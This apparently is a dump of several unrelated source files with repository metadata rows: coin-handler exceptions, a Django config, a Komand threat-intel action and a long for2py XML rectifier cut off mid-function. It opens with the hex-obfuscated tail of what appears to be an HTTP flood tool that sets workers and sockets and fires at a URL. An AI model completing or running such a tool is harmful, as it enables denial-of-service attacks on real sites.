opts, args = getopt.getopt(sys.argv[2:], "\x64\x68\x77\x3A\x73\x3A\x6D\x3A", ["\x64\x65\x62\x75\x67", "\x68\x65\x6C\x70", "\x77\x6F\x72\x6B\x65\x72\x73", "\x73\x6F\x63\x6B\x65\x74\x73", "\x6D\x65\x74\x68\x6F\x64" ])
workers = DEFAULT_WORKERS
socks = DEFAULT_SOCKETS
method = METHOD_GET
for o, a in opts:
if o in ("\x2D\x68\x68", "\x2D\x2D\x68\x65\x6C\x70"):
usage()
sys.exit()
elif o in ("\x2D\x73\x73", "\x2D\x2D\x73\x6F\x63\x6B\x65\x74"):
socks = int(a)
elif o in ("\x2D\x77\x77", "\x2D\x2D\x77\x6F\x72\x6B\x65\x72"):
workers = int(a)
elif o in ("\x2D\x64\x64", "\x2D\x2D\x64\x65\x62\x75\x67\x65\x64"):
global DEBUG
DEBUG = True
elif o in ("\x2D\x6D\x6D", "\x2D\x2D\x6D\x65\x74\x68\x6F\x64\x73"):
if a in (METHOD_GET, METHOD_POST, METHOD_RAND):
method = a
else:
error("\x6D\x65\x74\x68\x6F\x64\x20\x7B0\x7D\x20\x69\x73\x20\x69\x6E\x76\x61\x6C\x69\x64".format(a))
else:
error("\x6F\x70\x74\x69\x6F\x6E\x20\x27"+o+"\x27\x20\x64\x6F\x65\x73\x6E\x27\x74\x20\x65\x78\x69\x73\x74\x73")
r000t = R00T(url)
r000t.nr_workers = workers
r000t.method = method
r000t.nr_sockets = socks
r000t.fire()
except getopt.GetoptError, err:
sys.stderr.write(str(err))
usage()
sys.exit(2)
if __name__ == "\x5F\x5F\x6D\x61\x69\x6E\x5F\x5F":
main()
| 47.853392
| 611
| 0.618684
|
70048c27efd972e782d65da69997646b698672e8
| 1,435
|
py
|
Python
|
privex/coin_handlers/base/exceptions.py
|
Privex/python-coinhandlers
|
b24c0c3f7d81cedefd52a5837a371cfef2f83e97
|
[
"X11"
] | 2
|
2019-10-25T13:58:10.000Z
|
2020-02-13T16:34:05.000Z
|
privex/coin_handlers/base/exceptions.py
|
Privex/python-coinhandlers
|
b24c0c3f7d81cedefd52a5837a371cfef2f83e97
|
[
"X11"
] | null | null | null |
privex/coin_handlers/base/exceptions.py
|
Privex/python-coinhandlers
|
b24c0c3f7d81cedefd52a5837a371cfef2f83e97
|
[
"X11"
] | null | null | null |
class CoinHandlerException(Exception):
"""Base exception for all Coin handler exceptions to inherit"""
pass
class HandlerNotFound(CoinHandlerException):
"""A requested handler does not exist"""
pass
class TokenNotFound(CoinHandlerException):
"""The token/coin requested doesn't exist"""
pass
class AccountNotFound(CoinHandlerException):
"""The sending or receiving account requested doesn't exist"""
pass
class NotEnoughBalance(CoinHandlerException):
"""The sending account does not have enough balance for this operation"""
pass
class AuthorityMissing(CoinHandlerException):
"""Missing private key or other authorization for this operation"""
pass
class IssueNotSupported(CoinHandlerException):
"""This class does not support issuing, the token name cannot be issued, or other issue problems."""
pass
class IssuerKeyError(AuthorityMissing):
"""Attempted to issue tokens you don't have the issuer key for"""
pass
class DeadAPIError(CoinHandlerException):
"""A main API, e.g. a coin daemon or public node used by this coin handler is offline."""
pass
class MissingTokenMetadata(CoinHandlerException):
"""
Could not process a transaction or run the requested Loader/Manager method as required coin metadata is missing,
such as :py:attr:`payments.models.Coin.our_account` or a required key in the custom JSON settings.
"""
pass
| 27.596154
| 116
| 0.738676
|
beb0d54a24bb5aa31c5ddd6adaf0d401adb67f72
| 102
|
py
|
Python
|
src/fundraising/apps.py
|
earth-emoji/love
|
3617bd47c396803c411e136b3e1de87c18e03890
|
[
"BSD-2-Clause"
] | null | null | null |
src/fundraising/apps.py
|
earth-emoji/love
|
3617bd47c396803c411e136b3e1de87c18e03890
|
[
"BSD-2-Clause"
] | 7
|
2021-03-19T10:46:09.000Z
|
2022-03-12T00:28:55.000Z
|
src/fundraising/apps.py
|
earth-emoji/love
|
3617bd47c396803c411e136b3e1de87c18e03890
|
[
"BSD-2-Clause"
] | null | null | null |
from django.apps import AppConfig
class FundraisingConfig(AppConfig):
name = 'fundraising'
| 17
| 36
| 0.735294
|
37d857b538c521d0d52bf2601e367fa120f1b39b
| 1,271
|
py
|
Python
|
plugins/cisco_umbrella_investigate/komand_cisco_umbrella_investigate/actions/samples/action.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 46
|
2019-06-05T20:47:58.000Z
|
2022-03-29T10:18:01.000Z
|
plugins/cisco_umbrella_investigate/komand_cisco_umbrella_investigate/actions/samples/action.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 386
|
2019-06-07T20:20:39.000Z
|
2022-03-30T17:35:01.000Z
|
plugins/cisco_umbrella_investigate/komand_cisco_umbrella_investigate/actions/samples/action.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 43
|
2019-07-09T14:13:58.000Z
|
2022-03-28T12:04:46.000Z
|
import komand
from .schema import SamplesInput, SamplesOutput, Input
# Custom imports below
from komand.exceptions import PluginException
class Samples(komand.Action):
def __init__(self):
super(self.__class__, self).__init__(
name="samples",
description="Return all samples associated with the domain",
input=SamplesInput(),
output=SamplesOutput(),
)
def run(self, params={}):
URL = params.get(Input.URL)
limit = params.get("limit", None)
offset = params.get("offset", None)
sortby = params.get("sortby", None)
if not limit or limit == 0:
limit = 10
if not sortby or sortby == "":
sortby = "score"
if not offset:
offset = 0
try:
samples = self.connection.investigate.samples(URL, limit=limit, offset=offset, sortby=sortby)
except Exception as e:
raise PluginException(preset=PluginException.Preset.UNKNOWN, data=e)
return samples
def test(self):
return {
"limit": 1,
"moreDataAvailable": False,
"offset": 0,
"query": "*",
"samples": [],
"totalResults": 0,
}
| 27.042553
| 105
| 0.559402
|
481722a8b6edc9b4e2364a38d91cb07ba902f886
| 226,420
|
py
|
Python
|
delphi/translators/for2py/rectify.py
|
mikiec84/delphi
|
2e517f21e76e334c7dfb14325d25879ddf26d10d
|
[
"Apache-2.0"
] | 25
|
2018-03-03T11:57:57.000Z
|
2022-01-16T21:19:54.000Z
|
delphi/translators/for2py/rectify.py
|
mikiec84/delphi
|
2e517f21e76e334c7dfb14325d25879ddf26d10d
|
[
"Apache-2.0"
] | 385
|
2018-02-21T16:52:06.000Z
|
2022-02-17T07:44:56.000Z
|
delphi/translators/for2py/rectify.py
|
mikiec84/delphi
|
2e517f21e76e334c7dfb14325d25879ddf26d10d
|
[
"Apache-2.0"
] | 19
|
2018-03-20T01:08:11.000Z
|
2021-09-29T01:04:49.000Z
|
"""
The purpose of this module is to do all the clean up for translate.py.
This (rectify.py) module contains functions that receive OFP generated XML as an input.
Then, the functions removes any unnecessary elements and refactor randomly structured
(nested) elements into a correct structure. The output file will be
approximately 30%~40% lighter in terms of number of lines than the OFP XML.
Author: Terrence J. Lim
"""
import re
import os
import sys
import argparse
import json
import xml.etree.ElementTree as ET
import copy
from delphi.translators.for2py import For2PyError, syntax, f2grfn
from os.path import isfile, join
from typing import List, Tuple
TYPE_MAP = {
"int": "integer",
"bool": "logical",
}
class RectifiedXMLGenerator:
def __init__(self):
# True if derived type declaration exist
self.is_derived_type = False
# True if derived type var. reference exist
self.is_derived_type_ref = False
# True if current var. is an array
self.is_array = False
# True if format exists in the code
self.is_format = False
# True if current var. is for function argument
self.is_function_arg = False
# True only if goto-stmt exists in the AST
self.need_goto_elimination = False
# True if more goto-stmt exists
self.continue_elimination = False
# True if operation negation is needed
self.need_op_negation = False
# True if any statement requires reconstruction
self.need_reconstruct = False
# True if each goto case is ready for reconstruction
self.reconstruct_after_case_now = False
self.reconstruct_before_case_now = False
# True if each goto case encountered
self.label_before = False
self.label_after = False
# True if statement nests stop statement
self.is_stop = False
# True if statements follow either after
# goto or label. Both cannot be true
# at the same time
self.collect_stmts_after_goto = False
self.collect_stmts_after_label = False
# True if collecting of statement is done
self.collecting_stmts_done = False
# True if reconstruction (goto elimination) is done
self.reconstruction_for_after_done = False
self.reconstruction_for_before_done = False
# True if one reconstructed statement needs another
# reconstruction by nesting it under do while due to
# label_before case exist as it's parent goto
self.encapsulate_under_do_while = False
# Keep a track where goto was declared
# whether it's under program(main) or loop body
self.goto_under_loop = False
# Keeps track of the signed real/int literal constant inside data
# statements
self.is_data_stmt_constant = False
# Keeps records of encountered <goto-stmt> lbl value
self.goto_target_lbl_after = []
self.goto_target_lbl_before = []
# Keeps records of encountered <label> lbl value
self.label_lbl_for_before = []
self.label_lbl_for_after = []
# A name mapper list for declared
# 'label_flag_' variables
self.declared_label_flags = []
self.declared_goto_flags = []
# A list to hold save_entity tags
self.saved_entities = []
# Keep a track of all encountered goto and label stmts
self.encountered_goto_label = []
# Keep a track of goto and label with its case
self.goto_label_with_case = {}
# Keeps a track of current label of goto-stmt
self.current_label = None
# Keep a track of operations for conditional goto
# key will be the unique code assigned to each <goto-stmt>
# {code:Element}
self.conditional_op = {}
# Counts the number of <goto-stmt> in the code
self.goto_stmt_counter = 0
# Keep a track of collected goto-stmts and labels
# for goto elimination and reconstruction
self.stmts_after_goto = {
'goto-stmts': [],
'labels': [],
}
# Dictionary to hold statements before_after case
self.statements_to_reconstruct_before = {
"stmts-follow-label": [],
"count-gotos": 0,
}
# Dictionary to hold statements label_after case
self.statements_to_reconstruct_after = {
"stmts-follow-goto": [],
"stmts-follow-label": [],
"count-gotos": 0,
}
# Keeps a track of current derived type name
self.cur_derived_type_name = None
# Keeps a track of current scope of code
# i.e. program, main, or function, etc.
self.current_scope = None
# Keep a track of both array and non-array variables
# in the dictionary of {'name' : 'scope'}
self.declared_non_array_vars = {}
self.declared_array_vars = {}
# Keep a track of declared derived type variables
self.derived_type_var_holder_list = []
# Holds variables extracted from derived type refenrece
# i.e. x%y%z, then x and y and z
self.derived_type_refs = []
# Keeps track of subscripts of arrays
self.subscripts_holder = []
# Holds format XML for later reconstruction
self.format_holder = []
# Holds a type of parent element's type element
self.parent_type = ET.Element('')
# Holds XML of derived type reference for later reconstruction
self.derived_type_ref = ET.Element('')
# Actually holds XML of current scope
self.current_body_scope = ET.Element('')
# Keeps a track of parent statements to goto-stmt
self.goto_stmt_parents = []
# Keeps a track of parent statements to label
self.label_parents = []
# Flag to check if the variable is a character
self.is_character = False
# List to store all the character variables defined
self.character_var_list = []
# Keeps a track of the main body that the statement
# is nested under, i.e. program, loop, and if, etc
self.body_level = {
"current": None,
"prev": None,
"grand-prev": None,
}
self.body_level_rank = {
"program": 1,
"loop": 2,
"if": 2
}
self.body_elem_holder = {
"program": None,
"loop": None,
"if": None,
}
# Check for the status whether current <goto-stmt> is
# conditional or not.
self.conditional_goto = False
# True if goto handling needs outward or
# inward movement.
self.outward_move = False
self.inward_move = False
# True if another <if> appears before
# goto. This <if> has nothing to do
# conditional status of goto.
self.if_appear_before_goto = True
# True if goto is under <if> that is
# a conditional goto statement.
self.goto_under_if = False
# If goto is conditional and under else
# that is a case of conditional without operator
self.goto_under_else = False
# When handling function, collect names
self.args_for_function = []
# Holds arguments of subroutine or function XML object
self.arguments_list = {}
# Holds function argument types
self.argument_types = {}
# Temporarily holds the type of declaring variable type
self.variable_type = None
# Holds the caller arguments that are array
self.caller_arr_arguments = {}
# Set to true if handling <call>
self.call_function = False
self.original_fortran_file_abs_path = None
self.module_log_file_path = None
self.module_files_to_process = []
self.modules_in_file = []
self.derived_type_array_dimensions = {}
self.dim = 0
# Keeps a track of maximum number of function
# arguments that are member of interface
self.member_function_argument_max = 0
# Mark whether currently handling interface
# member functions
self.is_interface_member = False
# Keeps a track of interface function names
self.interface_functions = {}
self.interface_function_xml = {}
# Mark wheter currently handling interface
self.is_interface = False
# Keep a track of currently declaring interface name
self.cur_interface_name = None
# Keep a track of interface XML object for later update
self.interface_xml = {}
self.dimensions_holder = None
# Keep a dictionary of declared variables {"var_name":"type"}
# by their scope
self.variables_by_scope = {}
# Keep a track of used module in the current program
self.used_modules = []
# Holds module summary imported from modFileLog.json file
self.module_summary = {}
#################################################################
# #
# TAG LISTS FOR EACH HANDLER #
# #
#################################################################
file_child_tags = [
"program",
"subroutine",
"module",
"declaration",
"function",
"prefix"
]
program_child_tags = [
"header",
"body"
]
statement_child_tags = [
"assignment",
"write",
"format",
"stop",
"execution-part",
"print",
"open",
"read",
"close",
"call",
"statement",
"label",
"literal",
"continue-stmt",
"do-term-action-stmt",
"return",
"contains-stmt",
"declaration",
"prefix",
"function",
"internal-subprogram",
"internal-subprogram-part",
"prefix",
"exit",
"cycle",
]
loop_child_tags = [
"header",
"body",
"format"
]
specification_child_tags = [
"declaration",
"use",
]
declaration_child_tags = [
"type",
"dimensions",
"variables",
"format",
"name",
"type-declaration-stmt",
"prefix-spec",
"save-stmt",
"saved-entity",
"access-spec",
"attr-spec",
"access-stmt",
"access-id-list",
"constants",
"interface",
"subroutine",
"intent",
"names",
"procedure-stmt",
"literal",
"values"
]
value_child_tags = [
"literal",
"operation",
"name",
]
derived_type_child_tags = [
"declaration-type-spec",
"type-param-or-comp-def-stmt-list",
"component-decl-list__begin",
"component-initialization",
"data-component-def-stmt",
"component-def-stmt",
"component-attr-spec-list",
"component-attr-spec-list__begin",
"explicit-shape-spec-list__begin",
"explicit-shape-spec",
"explicit-shape-spec-list",
"component-attr-spec",
"component-attr-spec-list__begin",
"component-shape-spec-list__begin",
"explicit-shape-spec-list__begin",
"explicit-shape-spec",
"component-attr-spec",
"component-attr-spec-list",
"end-type-stmt",
"derived-type-def",
]
header_child_tags = [
"index-variable",
"operation",
"arguments",
"names",
"name",
"loop-control",
"label",
"literal",
"equiv-operand__equiv-op",
"subroutine-stmt",
"value-ranges",
]
body_child_tags = [
"specification",
"statement",
"loop",
"if",
"label",
"stop",
"do-term-action-stmt",
"select",
"case",
]
operand_child_tags = [
"name",
"literal",
"operation",
]
subscripts_child_tags = [
"name",
"literal",
"operation",
"argument",
"range",
]
index_range_child_tags = [
"lower-bound",
"upper-bound",
"step",
]
bound_child_tags = [
"literal",
"name",
"operation",
]
module_child_tags = [
"header",
"body",
"module-stmt",
"members",
"end-module-stmt",
"contains-stmt",
]
members_child_tags = [
"subroutine",
"module-subprogram",
"module-subprogram-part",
"declaration",
"prefix",
"function",
]
only_child_tags = [
"name",
"only",
"only-list",
]
select_child_tags = [
"header",
"body",
]
case_child_tags = [
"header",
"body",
]
unnecessary_tags = [
"do-variable",
"end-program-stmt",
"main-program",
"char-selector",
"declaration-type-spec",
"type-param-or-comp-def-stmt-list",
"component-decl-list__begin",
"data-component-def-stmt",
"component-def-stmt",
"component-initialization",
"attr-spec",
"attr-id",
"designator",
"int-literal-constant",
"char-literal-constant",
"real-literal-constant",
"io-control-spec",
"array-spec-element",
"print-stmt",
"print-format",
"keyword-argument",
"end-subroutine-stmt",
"logical-literal-constant",
"equiv-op",
"equiv-operand",
"saved-entity-list__begin",
"saved-entity-list",
"access-id",
"parameter-stmt",
"type-param-value",
"char-selector",
"interface-block",
"interface-stmt",
"interface-body",
"interface-specification",
"end-interface-stmt",
"select-case-stmt",
"case-selector",
"case-stmt",
"end-select-stmt",
"component-attr-spec-list__begin",
"explicit-shape-spec-list__begin",
"explicit-shape-spec",
"explicit-shape-spec-list",
"component-attr-spec",
"component-attr-spec-list",
"sequence-stmt",
"private-or-sequence",
"data-stmt-set",
"data-stmt",
"signed-real-literal-constant",
"signed-int-literal-constant",
"data-stmt-constant",
"data-i-do-object-list__begin",
]
output_child_tags = [
"name",
"literal",
"operation",
]
dtype_var_declaration_tags = [
"component-decl",
"component-decl-list",
"component-decl-list__begin",
]
variable_child_tags = [
"initial-value",
"length",
"dimensions",
]
#################################################################
# #
# HANDLER FUNCTIONS #
# #
#################################################################
def handle_tag_file(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the file elements.
In order to control new sub-element creation under
the current element, if child.tag == "__tag_name__"
has been added. If any new tag(s) that is not being
handled currently, appears in the future, add
child.tag == "__tag_name__" at the end of the last
condition. This applies all other handler functions.
<file>
</file>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
try:
_ = self.file_child_tags.index(child.tag)
except KeyError:
assert (
False
), f'In handle_tag_file: "{child.tag}" not handled'
if len(child) > 0 or child.text:
self.parseXMLTree(child, cur_elem, current, parent, traverse)
def handle_tag_program(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML
elements between the program elements.
<program>
</program>
"""
self.current_scope = root.attrib['name']
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag in self.program_child_tags:
if child.tag == "body":
self.current_body_scope = cur_elem
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_program: "{child.tag}" not handled'
def handle_tag_header(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the header elements.
<header>
</header>
"""
# This holder will be used only when refactoring of header is needed,
# such as with odd syntax of .eqv. operator
temp_elem_holder = []
target_tags = [
"name",
"literal",
"equiv-operand__equiv-op"
]
need_refactoring = False
for child in root:
self.clean_attrib(child)
if child.tag in self.header_child_tags:
if child.tag == "subroutine-stmt":
current.attrib.update(child.attrib)
else:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
# Add a new interface:[] element into the interface
# function tracker dictionary if current header is
# for declaring interface.
if self.is_interface and cur_elem.tag == "name":
self.interface_functions[cur_elem.attrib['id']] = []
self.interface_function_xml[cur_elem.attrib['id']] = {}
self.cur_interface_name = cur_elem.attrib['id']
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
# If the current header belongs to <function>,
# we need to manipulate the structure of the AST
# to have an equivalent syntax as <subroutine>
if (
parent.tag == "function"
and cur_elem.tag == "names"
):
current.remove(cur_elem)
count = len(self.args_for_function)
cur_elem = ET.SubElement(
current, "arguments",
{"count": str(count)})
for arg in self.args_for_function:
_ = ET.SubElement(
cur_elem, "argument",
{"name": arg,
"is_array": "false"}
)
# If the current header belongs to <subroutine>,
# add it to the arguments_list for later
# array status marking when a function call happens
if (
(parent.tag == "subroutine"
and child.tag == "arguments")
or parent.tag == "function"
):
sub_name = parent.attrib["name"]
self.arguments_list[sub_name] = cur_elem
if cur_elem.tag in target_tags:
temp_elem_holder.append(cur_elem)
if cur_elem.tag == "equiv-operand__equiv-op":
need_refactoring = True
# Handler for the case where label appears under
# the header element. This happens when label
# is assigned to the if statement.
if (
traverse == 1
and child.tag == "label"
):
lbl = child.attrib['lbl']
parent.attrib['label'] = lbl
self.encountered_goto_label.append(lbl)
# Label-before case
if (
not self.goto_target_lbl_after
or lbl not in self.goto_target_lbl_after
):
self.goto_label_with_case[lbl] = "before"
if self.label_after:
self.label_before = False
else:
self.label_before = True
if lbl not in self.label_lbl_for_before:
self.label_lbl_for_before.append(lbl)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_header: Empty elements "{child.tag}"'
# Revert the argument list back to its empty state to accommodate for
# new functions
self.args_for_function = []
# equivalent operator has a weird ast syntax,
# so it requires refactoring.
if need_refactoring:
self.reconstruct_header(temp_elem_holder, current)
def handle_tag_body(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the body elements.
<body>
</body>
"""
current.attrib['parent'] = parent.tag
self.body_elem_holder[parent.tag] = current
# Keeping the track of the body's boundary.
if traverse == 1:
if self.body_level['prev'] is None:
self.body_level['grand-prev'] = parent.tag
self.body_level['prev'] = parent.tag
else:
assert (
self.body_level['current'] is not None
), "self.body_level['current'] cannot be None."
self.body_level['grand-prev'] = self.body_level['prev']
self.body_level['prev'] = self.body_level['current']
self.body_level['current'] = parent.tag
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag in self.body_child_tags:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if traverse == 1:
# Handling conditional <goto-stmt>
if (
parent.tag == "if"
and "goto-stmt" in cur_elem.attrib
):
assert (
"lbl" in cur_elem.attrib
), "Label 'lbl' must be present in <if> attrib"
# goto-stmt counter will be used as
# an identifier for two statements
# that are nested one in another
unique_code = str(self.goto_stmt_counter)
parent.attrib['conditional-goto-stmt-lbl'] = \
cur_elem.attrib['lbl']
parent.attrib['code'] = unique_code
if "goto-move" in cur_elem.attrib:
parent.attrib['goto-move'] = "true"
if "goto-remove" in cur_elem.attrib:
parent.attrib['goto-remove'] = "true"
cur_elem.attrib['conditional-goto-stmt'] = "true"
cur_elem.attrib['code'] = unique_code
# If the <statement> for <goto-stmt> is nested
# under the conditional <if>, then the boundary of
# <statement> remains as the current - 1 level.
cur_elem.attrib['body-level'] = \
self.body_level['prev']
self.body_level['current'] = self.body_level['prev']
else:
self.body_level['grand-prev'] = \
self.body_level['prev']
self.body_level['prev'] = self.body_level['current']
self.body_level['current'] = parent.tag
# Check if conditional goto-stmt is under loop statement
if parent.tag == "loop":
if (
child.tag == "if"
or (
child.tag == "statement"
and "conditional-goto-stmt" in
child.attrib
)
):
self.goto_under_loop = True
# Check a case where <if> under another <if>.
# <if>
# <if>
if (
grandparent.tag == "body"
and "parent" in grandparent.attrib
and grandparent.attrib['parent'] == "if"
):
self.goto_under_if = True
else:
# A Checker for whether current statement is
# nested under the loop.
if "body-level" in cur_elem.attrib:
if cur_elem.attrib['body-level'] == "loop":
self.goto_under_loop = True
else:
self.goto_under_loop = False
new_parent = current
# Reconstruction of statements
if (
"parent" in current.attrib
and (
(not self.goto_under_loop
and not self.goto_under_if
and current.attrib['parent'] == "program")
or (self.goto_under_if
and current.attrib['parent'] == "if")
or (self.goto_under_loop
and current.attrib['parent'] == "loop")
)
):
# Remove statements marked for removal(2nd traverse)
if (
"goto-remove" in child.attrib
or "goto-move" in child.attrib
):
current.remove(cur_elem)
if (
self.reconstruct_after_case_now
and
not self.reconstruction_for_after_done
):
self.reconstruct_goto_after_label(
new_parent, traverse,
self.statements_to_reconstruct_after
)
if self.label_lbl_for_before:
self.continue_elimination = True
if (
self.reconstruct_before_case_now
and
not self.reconstruction_for_before_done
):
reconstruct_target = \
self.statements_to_reconstruct_before
self.reconstruct_goto_before_label(
new_parent, traverse, reconstruct_target
)
if self.label_lbl_for_after:
self.continue_elimination = True
if (
not self.label_lbl_for_before
and not self.label_lbl_for_after
):
self.continue_elimination = False
else:
assert False, f'In handle_tag_body: "{child.tag}" ' \
f'not handled'
else:
if (
child.tag in self.body_child_tags
and child.tag != "statement"
):
_ = ET.SubElement(
current, child.tag, child.attrib
)
elif child.tag == "statement":
if len(child) > 0:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_body: Empty elements "{child.tag}"' \
f' not handled'
if self.is_format:
self.reconstruct_format(parent, traverse)
self.is_format = False
def handle_tag_specification(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the specification elements.
<specification>
</specification>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
try:
_ = self.specification_child_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_specification: "{child.tag}" not handled'
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
if child.tag != "declaration":
assert (
False
), f'In handle_tag_specification: Empty elements ' \
f'"{child.tag}"'
def handle_tag_declaration(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the declaration elements.
<declaration>
</declaration>
"""
is_derived_type_dimension_setting = False
is_end_of_one_dimension = False
dim_number = 0
for child in root:
self.clean_attrib(child)
# Temporarily hold the declaring variable's type.
if child.tag == "type" and "name" in child.attrib:
self.variable_type = child.attrib['name']
# Keep a track of array in derived type dimension information.
if child.tag == "explicit-shape-spec-list__begin":
is_derived_type_dimension_setting = True
self.dim += 1
dim_number += 1
self.derived_type_array_dimensions[self.dim] = []
elif child.tag == "explicit-shape-spec":
is_end_of_one_dimension = True
dim_number += 1
elif child.tag == "explicit-shape-spec-list":
is_derived_type_dimension_setting = False
if len(child) > 0 or child.text:
if child.tag in self.declaration_child_tags:
if child.tag == "format":
self.is_format = True
self.format_holder.append(child)
elif (
child.tag == "name"
or child.tag == "literal"
):
if is_derived_type_dimension_setting:
child.attrib["dim-number"] = str(dim_number)
self.derived_type_array_dimensions[self.dim].append(child)
else:
self.derived_type_var_holder_list.append(child)
else:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "dimensions":
self.is_array = True
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif (
child.tag == "component-array-spec"
or child.tag == "operation"
):
self.derived_type_var_holder_list.append(child)
else:
assert (
False
), f'In handle_tag_declaration: "{child.tag}" not handled'
else:
if child.tag in self.declaration_child_tags:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "saved-entity":
# If you find saved-entity, add the element to a list
# and remove it from the XML since you want to shift
# it below save-stmt
self.saved_entities.append(cur_elem)
current.remove(cur_elem)
elif child.tag == "save-stmt":
# If you find save-stmt, check if it contains
# saved-entities and add it below this XML element
if len(self.saved_entities) > 0:
for item in self.saved_entities:
_ = ET.SubElement(cur_elem, item.tag,
item.attrib)
# Reinitialize this list since you'll need an
# empty one for the next SAVE statement
self.saved_entities = []
elif (
child.tag == "component-decl"
or child.tag == "component-decl-list"
or child.tag == "component-decl-list__begin"
):
current.attrib['type'] = "derived-type"
self.derived_type_var_holder_list.append(child)
elif child.tag == "component-array-spec":
self.derived_type_var_holder_list.append(child)
else:
if (
child.tag not in self.unnecessary_tags
and child.tag not in self.derived_type_child_tags
):
assert (
False
), f'self.In handle_tag_declaration: Empty elements "' \
f'{child.tag}" not handled'
if self.is_array:
self.is_array = False
if self.is_character:
self.is_character = False
# If is_derived_type is true,
# reconstruct the derived type declaration AST structure
if self.is_derived_type:
if self.derived_type_var_holder_list:
# Modify or add 'name' attribute of the MAIN (or the outer
# most) <type> elements with the name of derived type name
self.parent_type.set("name", self.cur_derived_type_name)
self.reconstruct_derived_type_declaration()
self.is_derived_type = False
self.variable_type = None
if self.dimensions_holder:
self.restruct_declaration(current, parent)
parent.remove(current)
self.dimensions_holder = None
# Keep a track of all declared variables by scope
if (
"type" in current.attrib
and current.attrib['type'] == "variable"
):
if self.current_scope not in self.variables_by_scope:
self.variables_by_scope[self.current_scope] = {}
for elem in current:
if elem.tag == "type":
var_type = elem.attrib['name']
elif elem.tag == "variables":
for subElem in elem:
if subElem.tag == "variable":
self.variables_by_scope[self.current_scope][subElem.attrib['id']] = var_type
def handle_tag_type(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the variables elements.
<type>
</type>
"""
if current.attrib.get("name"):
if current.attrib["name"].lower() == "character":
self.is_character = True
current.set("string_length", str(1))
dim_number = 0
is_derived_type_dimension_setting = False
for child in root:
self.clean_attrib(child)
if "keyword2" in child.attrib:
if child.attrib['keyword2'] == "":
current.attrib['keyword2'] = "none"
else:
current.attrib['keyword2'] = child.attrib['keyword2']
else:
current.attrib['keyword2'] = "none"
if child.tag == "type":
# Having a nested "type" indicates that this is
# a "derived type" declaration.
# In other word, this is a case of
# <type>
# <type>
# ...
# </type>
# </type>
self.is_derived_type = True
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parent_type = current
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif child.tag == "derived-type-stmt":
# If child.tag is derived-type-stmt while self.is_derived_type
# is not true, it's an indication of only a single variable
# was declared under the derived type declaration, so the syntax
# has no nested type case like above. Thus, in order to make
# the syntax same, I'm adding another type and nest everything
# under it.
if not self.is_derived_type:
self.is_derived_type = True
type_elem = ET.SubElement(current, current.tag,
current.attrib)
type_elem.set("is_derived_type", str(self.is_derived_type))
type_elem.set("name", child.attrib['id'])
self.parent_type = current
# Modify or add 'name' attribute of the <type>
# elements with the name of derived type name
current.set("name", child.attrib['id'])
# And, store the name of the derived type name for
# later setting the outer most <type> elements's name attribute
self.cur_derived_type_name = child.attrib['id']
elif child.tag == "explicit-shape-spec-list__begin":
is_derived_type_dimension_setting = True
self.dim += 1
dim_number += 1
self.derived_type_array_dimensions[self.dim] = []
elif child.tag == "explicit-shape-spec":
is_end_of_one_dimension = True
dim_number += 1
elif child.tag == "explicit-shape-spec-list":
is_derived_type_dimension_setting = False
elif child.tag == "intrinsic-type-spec":
if self.is_derived_type:
self.derived_type_var_holder_list.append(child)
elif child.tag == "derived-type-spec":
if self.variable_type == None:
self.variable_type = child.attrib['typeName']
if not self.is_derived_type:
self.is_derived_type = True
current.set("name", child.attrib['typeName'])
else:
self.derived_type_var_holder_list.append(child)
elif child.tag == "literal":
if self.is_character:
self.derived_type_var_holder_list.append(child)
current.set("string_length", str(child.attrib["value"]))
elif is_derived_type_dimension_setting:
child.attrib["dim-number"] = str(dim_number)
self.derived_type_array_dimensions[self.dim].append(child)
else:
self.derived_type_var_holder_list.append(child)
elif (
is_derived_type_dimension_setting
and child.tag == "name"
):
child.attrib["dim-number"] = str(dim_number)
self.derived_type_array_dimensions[self.dim].append(child)
elif (
child.tag == "component-array-spec"
or child.tag == "operation"
):
self.derived_type_var_holder_list.append(child)
elif child.tag in self.dtype_var_declaration_tags:
self.derived_type_var_holder_list.append(child)
elif child.tag == "length":
cur_elem = ET.SubElement(current, child.tag, child.attrib)
self.parseXMLTree(child, cur_elem, current, parent, traverse)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
